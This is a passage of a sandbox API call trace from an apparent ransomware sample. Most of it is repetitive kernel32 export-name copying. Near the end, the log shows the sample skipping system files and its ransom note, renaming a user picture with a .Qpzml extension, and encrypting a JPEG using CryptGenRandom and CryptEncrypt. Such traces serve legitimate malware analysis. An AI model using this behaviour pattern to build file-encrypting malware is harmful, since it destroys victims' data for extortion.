lpString1="CreateJobSet") returned="CreateJobSet" [0086.306] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.306] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.306] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.306] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.306] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.306] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.306] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.306] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.306] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.306] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.306] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.306] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.306] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.306] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.306] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.307] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.307] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.307] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.307] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.307] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.307] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.307] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.307] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.307] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.307] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.307] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.307] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.307] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.307] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.307] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.307] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.307] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.307] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.307] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.308] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.308] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.308] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.308] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.308] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.308] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.308] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.308] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.308] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.308] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.308] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.308] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.308] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.308] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.308] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.308] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.308] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.308] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.308] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.309] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.309] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.309] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.309] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.309] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.309] lstrlenA (lpString="DELETEATOM") returned 10 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.309] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.309] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.309] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.309] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.309] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.309] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.309] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.309] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.309] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.309] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.309] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.309] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.309] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.309] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.310] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.310] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.310] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.310] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.310] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.310] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.310] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.310] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.310] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.310] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.310] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.310] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.310] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.310] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.310] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.310] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.310] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.310] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.310] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.311] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.311] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.311] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.311] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.311] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.311] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.311] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.311] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.311] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.311] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.311] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif") returned 58 [0086.311] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif.Qpzml") returned 64 [0086.311] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\lw_4.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif.Qpzml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\lw_4.gif.qpzml"), dwFlags=0x0) returned 1 [0086.312] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.312] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.312] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.313] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e044300, ftCreationTime.dwHighDateTime=0x1d4d3c8, ftLastAccessTime.dwLowDateTime=0xff933860, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xff933860, ftLastWriteTime.dwHighDateTime=0x1d4c7ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="npHgP3n.jpg", cAlternateFileName="")) returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="autorun.inf") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="boot.ini") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="desktop.ini") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="ntuser.dat") returned -1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="iconcache.db") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="bootsect.bak") returned 1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="ntuser.dat.log") returned -1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="thumbs.db") returned -1 [0086.313] lstrcmpiW (lpString1="npHgP3n.jpg", lpString2="Bootfont.bin") returned 1 [0086.313] lstrlenW (lpString="npHgP3n.jpg") returned 11 [0086.313] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.313] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.313] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.313] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.313] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.313] lstrlenW (lpString="npHgP3n.jpg") returned 11 [0086.313] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.313] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="npHgP3n.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg" [0086.313] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\npHgP3n.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\nphgp3n.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.314] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=15918) returned 1 [0086.314] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.314] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.314] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.314] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.314] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.314] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.315] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.315] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.315] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.316] CloseHandle (hObject=0x43c) returned 1 [0086.316] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.316] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, 